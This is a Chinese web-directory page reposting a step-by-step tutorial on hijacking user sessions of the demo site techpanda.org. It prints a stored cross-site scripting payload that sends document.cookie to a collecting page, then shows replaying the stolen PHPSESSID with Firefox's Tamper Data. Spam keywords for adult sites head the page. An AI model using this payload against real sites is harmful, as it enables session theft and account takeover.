日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

黑客行為:入侵一個網站

在這個實際的場景中,我們將劫持位于www.techpanda.org(可能需要外網訪問)的web應用程序的用戶會話。我們將使用跨站點腳本來獲取cookie會話id,然后使用它來模擬一個合法的用戶會話。

假設攻擊者可以訪問web應用程序,并且他想劫持使用同一應用程序的其他用戶的會話。這種攻擊的目標可能是獲得對web應用程序的管理訪問權,假設攻擊者的訪問帳戶是有限的。

準備開始

  • 打開http://www.techpanda.org/
  • 如果你已經成功登錄,那么你將跳轉到如下頁面
從實戰中了解網絡安全,手把手教你如何入侵一個網站

 

  • 點擊Add New Contact
  • 輸入以下內容作為first name

<a href=# onclick="document.location='http://techpanda.org/snatch_sess_id.php?c='+escape(document.cookie);">Dark</a>

上面的代碼使用了JAVAScript,它添加了一個帶有onclick事件的超鏈接。當不知情的用戶單擊該鏈接時,事件將檢索PHP cookie會話ID并將其連同URL中的會話ID一起發送到snatch_sess_id.php頁面

從實戰中了解網絡安全,手把手教你如何入侵一個網站

 

  • 輸入如下所示的其余細節
  • 點擊Save Changes
從實戰中了解網絡安全,手把手教你如何入侵一個網站

 

  • 現在,你的儀表板將看起來像下面這樣
從實戰中了解網絡安全,手把手教你如何入侵一個網站

 

  • 因為跨站點腳本代碼存儲在數據庫中,所以每次有訪問權限的用戶登錄時都會加載它
  • 讓我們假設管理員登錄并單擊顯示為Dark的超鏈接
  • 我們將獲得一個顯示在URL中的會話id的窗口
從實戰中了解網絡安全,手把手教你如何入侵一個網站

 

注意:腳本可以將值發送到存儲PHPSESSID的遠程服務器,然后用戶重定向回網站,就像什么都沒有發生一樣。

使用Firefox和Tamper Data插件來模擬會話

下面的流程圖顯示了完成這個練習必須采取的步驟。

從實戰中了解網絡安全,手把手教你如何入侵一個網站

 

  • 你將需要Firefox web瀏覽器和Tamper Data插件來完成這部分
  • 打開Firefox并安裝添加,如下圖所示
從實戰中了解網絡安全,手把手教你如何入侵一個網站

 


從實戰中了解網絡安全,手把手教你如何入侵一個網站

 

  • 搜索tamper data,然后單擊安裝,如上所示
從實戰中了解網絡安全,手把手教你如何入侵一個網站

 

  • 點擊Accept and Install…
從實戰中了解網絡安全,手把手教你如何入侵一個網站

 


從實戰中了解網絡安全,手把手教你如何入侵一個網站

 

  • 當安裝完成時,單擊Restart now
  • 如果菜單欄沒有顯示,請啟用它
從實戰中了解網絡安全,手把手教你如何入侵一個網站

 

  • 單擊tools,然后選擇tamper data,如下所示
從實戰中了解網絡安全,手把手教你如何入侵一個網站

 

  • 你將看到以下窗口。注意:如果窗戶不是空,點擊clear按鈕
從實戰中了解網絡安全,手把手教你如何入侵一個網站

 

  • 點擊Start Tamper
  • 切換回Firefox web瀏覽器,輸入http://www.techpanda.org/dashboard.php,然后按enter鍵加載頁面
  • 你將從tamper data中得到以下彈出框
從實戰中了解網絡安全,手把手教你如何入侵一個網站

 

  • 彈出窗口有三個選項。Tamper選項允許你在將HTTP頭信息提交給服務器之前修改它。
  • 點擊它,你將看到以下窗口
從實戰中了解網絡安全,手把手教你如何入侵一個網站

 

  • 復制從攻擊URL復制的PHP會話ID,并將其粘貼到等號后面。現在你的值應該是這樣的

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

  • 點擊OK按鈕
  • 你將再次看到tamper data彈出窗口
從實戰中了解網絡安全,手把手教你如何入侵一個網站

 

  • 取消Continue Tampering復選框
  • 完成后單擊submit按鈕,你應該能夠看到如下所示的信息
從實戰中了解網絡安全,手把手教你如何入侵一個網站

 

注意:我們沒有登錄,我們使用使用跨站點腳本檢索到的PHPSESSID值模擬了一個登錄會話

希望通過這篇文章你們能夠對網絡滲透有一個初步了解。

分享到:
標簽:網絡安全
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定